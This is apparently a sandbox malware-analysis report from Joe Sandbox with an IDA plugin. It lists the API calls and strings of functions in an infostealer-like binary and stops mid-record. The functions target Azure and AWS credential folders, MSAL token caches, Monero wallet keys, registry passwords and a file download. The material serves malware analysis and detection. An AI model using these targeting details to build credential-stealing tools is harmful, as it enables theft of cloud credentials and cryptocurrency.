Part of subcall function 009852C0: lstrlen.KERNEL32(00000000), ref: 0098532F
Part of subcall function 009852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00985364
Part of subcall function 009852C0: lstrlen.KERNEL32(00000000), ref: 00985383
Part of subcall function 009852C0: lstrlen.KERNEL32(00000000), ref: 009853AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0098578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985A0C
Sleep.KERNEL32(0000EA60), ref: 00985A1B

Strings

ERROR, xrefs: 00985636
ERROR, xrefs: 009859FE
ERROR, xrefs: 0098577D
ERROR, xrefs: 00985693
ERROR, xrefs: 00985932
ERROR, xrefs: 00985849

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 70ccd3bfd6bb1a26f5cc4c7f1fdb6ff79b035b51506f43770098ace4b9d2268a
Instruction ID: 65ea619f9c0556ee88ae17e0879814a47675955d09779976da43c68b7e9941ee
Opcode Fuzzy Hash: 70ccd3bfd6bb1a26f5cc4c7f1fdb6ff79b035b51506f43770098ace4b9d2268a
Instruction Fuzzy Hash: 3BE1FE72D101049BDB18FBA4DC96FED7378ABD4300F508529B506A7691EF786B0DCBA2

Function 00984D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00988DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988E0B

lstrcat.KERNEL32(?,00000000), ref: 00984DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00984DCD

Part of subcall function 00984910: wsprintfA.USER32 ref: 0098492C
Part of subcall function 00984910: FindFirstFileA.KERNEL32(?,?), ref: 00984943

lstrcat.KERNEL32(?,00000000), ref: 00984E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00984E59

Part of subcall function 00984910: StrCmpCA.SHLWAPI(?,00990FDC), ref: 00984971
Part of subcall function 00984910: StrCmpCA.SHLWAPI(?,00990FE0), ref: 00984987
Part of subcall function 00984910: FindNextFileA.KERNEL32(000000FF,?), ref: 00984B7D
Part of subcall function 00984910: FindClose.KERNEL32(000000FF), ref: 00984B92

lstrcat.KERNEL32(?,00000000), ref: 00984EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00984EE5

Part of subcall function 00984910: wsprintfA.USER32 ref: 009849B0
Part of subcall function 00984910: StrCmpCA.SHLWAPI(?,009908D2), ref: 009849C5
Part of subcall function 00984910: wsprintfA.USER32 ref: 009849E2
Part of subcall function 00984910: PathMatchSpecA.SHLWAPI(?,?), ref: 00984A1E
Part of subcall function 00984910: lstrcat.KERNEL32(?,0084EA88), ref: 00984A4A
Part of subcall function 00984910: lstrcat.KERNEL32(?,00990FF8), ref: 00984A5C
Part of subcall function 00984910: lstrcat.KERNEL32(?,?), ref: 00984A70
Part of subcall function 00984910: lstrcat.KERNEL32(?,00990FFC), ref: 00984A82
Part of subcall function 00984910: lstrcat.KERNEL32(?,?), ref: 00984A96
Part of subcall function 00984910: CopyFileA.KERNEL32(?,?,00000001), ref: 00984AAC
Part of subcall function 00984910: DeleteFileA.KERNEL32(?), ref: 00984B31

Strings

Azure\.aws, xrefs: 00984E5F
Azure\.azure, xrefs: 00984DD3
\.IdentityService\, xrefs: 00984ED9
*.*, xrefs: 00984E64
msal.cache, xrefs: 00984EF0
\.azure\, xrefs: 00984DC1
\.aws\, xrefs: 00984E4D
*.*, xrefs: 00984DD8
Azure\.IdentityService, xrefs: 00984EEB

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: f504bae1530af715509c2567ec47cb2da19725ed400e6df00b04adf5c45a8caf
Instruction ID: 498abb71db34f62ff04fafcc12358b179bc096683738c90785354e0904dbb6d0
Opcode Fuzzy Hash: f504bae1530af715509c2567ec47cb2da19725ed400e6df00b04adf5c45a8caf
Instruction Fuzzy Hash: A34196BA94020867DB14F770EC47FED7338ABA4704F404594B589661C1FEF5ABC98BA2

Function 00971310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009712B4
Part of subcall function 009712A0: RtlAllocateHeap.NTDLL(00000000), ref: 009712BB
Part of subcall function 009712A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 009712D7
Part of subcall function 009712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009712F5
Part of subcall function 009712A0: RegCloseKey.ADVAPI32(?), ref: 009712FF

lstrcat.KERNEL32(?,00000000), ref: 0097134F
lstrlen.KERNEL32(?), ref: 0097135C
lstrcat.KERNEL32(?,.keys), ref: 00971377

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 00988B60: GetSystemTime.KERNEL32(00990E1A,0084A570,009905AE,?,?,009713F9,?,0000001A,00990E1A,00000000,?,00849138,?,\Monero\wallet.keys,00990E17), ref: 00988B86

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00971465

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009799EC
Part of subcall function 009799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00979A11
Part of subcall function 009799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00979A31
Part of subcall function 009799C0: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 00979A5A
Part of subcall function 009799C0: LocalFree.KERNEL32(0097148F), ref: 00979A90
Part of subcall function 009799C0: CloseHandle.KERNEL32(000000FF), ref: 00979A9A

DeleteFileA.KERNEL32(00000000), ref: 009714EF

Strings

.keys, xrefs: 0097136B
wallet_path, xrefs: 00971330
SOFTWARE\monero-project\monero-core, xrefs: 00971335
\Monero\wallet.keys, xrefs: 0097138D

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 9e84a992281182f2e5e1f24873a03d95c57c627b70d03f637104dc3feb6fe1f4
Instruction ID: 7e3629d219d01923d12ce4a99305872190dfa56e4ebe7dbd9801b9e5977c05ba
Opcode Fuzzy Hash: 9e84a992281182f2e5e1f24873a03d95c57c627b70d03f637104dc3feb6fe1f4
Instruction Fuzzy Hash: 365152B1D501195BDB15FB60DC92FED733CAF94300F4041D9B60AA2192EE746B8ACFA6

Function 009775D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009772D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0097733A
Part of subcall function 009772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009773B1
Part of subcall function 009772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0097740D
Part of subcall function 009772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00977452
Part of subcall function 009772D0: HeapFree.KERNEL32(00000000), ref: 00977459

lstrcat.KERNEL32(2F3D1020,009917FC), ref: 00977606
lstrcat.KERNEL32(2F3D1020,00000000), ref: 00977648
lstrcat.KERNEL32(2F3D1020, : ), ref: 0097765A
lstrcat.KERNEL32(2F3D1020,00000000), ref: 0097768F
lstrcat.KERNEL32(2F3D1020,00991804), ref: 009776A0
lstrcat.KERNEL32(2F3D1020,00000000), ref: 009776D3
lstrcat.KERNEL32(2F3D1020,00991808), ref: 009776ED
task.LIBCPMTD ref: 009776FB

Strings

: , xrefs: 0097764E

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 0df6f31d4c1a05bf9ef1c23e12fcb381dec4586641e5b51de995c2876fce014d
Instruction ID: 6868c64a0c6c00fdc2c1fd805bbe4b7f2ebd04bf88e7cbfaa874068da62e62e6
Opcode Fuzzy Hash: 0df6f31d4c1a05bf9ef1c23e12fcb381dec4586641e5b51de995c2876fce014d
Instruction Fuzzy Hash: 19315CB2D00109EBCB04EBF8DC89EFF7378BB85301B148618F106A7290DE74A946CB52

Function 00987500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00987542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0098757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987603
RtlAllocateHeap.NTDLL(00000000), ref: 0098760A
wsprintfA.USER32 ref: 00987640

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Strings

:, xrefs: 0098755C
\, xrefs: 00987560
C, xrefs: 0098754C

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 033201ef6fd9fd1e15bb2134168473ad6e850d103228779d0b773948fec28166
Instruction ID: daadccf0b42ad4e30f3a29b9d9139a06b7f9e9240a22a8146c91555705ae3f0e
Opcode Fuzzy Hash: 033201ef6fd9fd1e15bb2134168473ad6e850d103228779d0b773948fec28166
Instruction Fuzzy Hash: 8F41A6B1D04248ABDF10EF94DC45BDEBBB8EF48704F100199F509A7380DB78AA44CBA5

Function 00988100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0084E428,00000000,?,00990E2C,00000000,?,00000000), ref: 00988130
RtlAllocateHeap.NTDLL(00000000), ref: 00988137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00988158
__aulldiv.LIBCMT ref: 00988172
__aulldiv.LIBCMT ref: 00988180
wsprintfA.USER32 ref: 009881AC

Strings

%d MB, xrefs: 009881A3
@, xrefs: 0098814D

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 4ed001b9af1a3f723fb3643daa56ea94c8487a4085931cdd835551a7cf46f505
Instruction ID: ead8245380a547ebc7ff9cf79025ff9dbdf8e5efe300cfe88d1df03a9a3ebc34
Opcode Fuzzy Hash: 4ed001b9af1a3f723fb3643daa56ea94c8487a4085931cdd835551a7cf46f505
Instruction Fuzzy Hash: 13210BB1E44218ABDB04DFD4CC49FAFB7B8FB44B14F104609F615BB280DBB959018BA5

Function 009760A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974839
Part of subcall function 009747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974849

InternetOpenA.WININET(00990DF7,00000001,00000000,00000000,00000000), ref: 0097610F
StrCmpCA.SHLWAPI(?,0084EAD8), ref: 00976147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0097618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009761B3
InternetReadFile.WININET(?,?,00000400,?), ref: 009761DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0097620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00976249
InternetCloseHandle.WININET(?), ref: 00976253
InternetCloseHandle.WININET(00000000), ref: 00976260

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
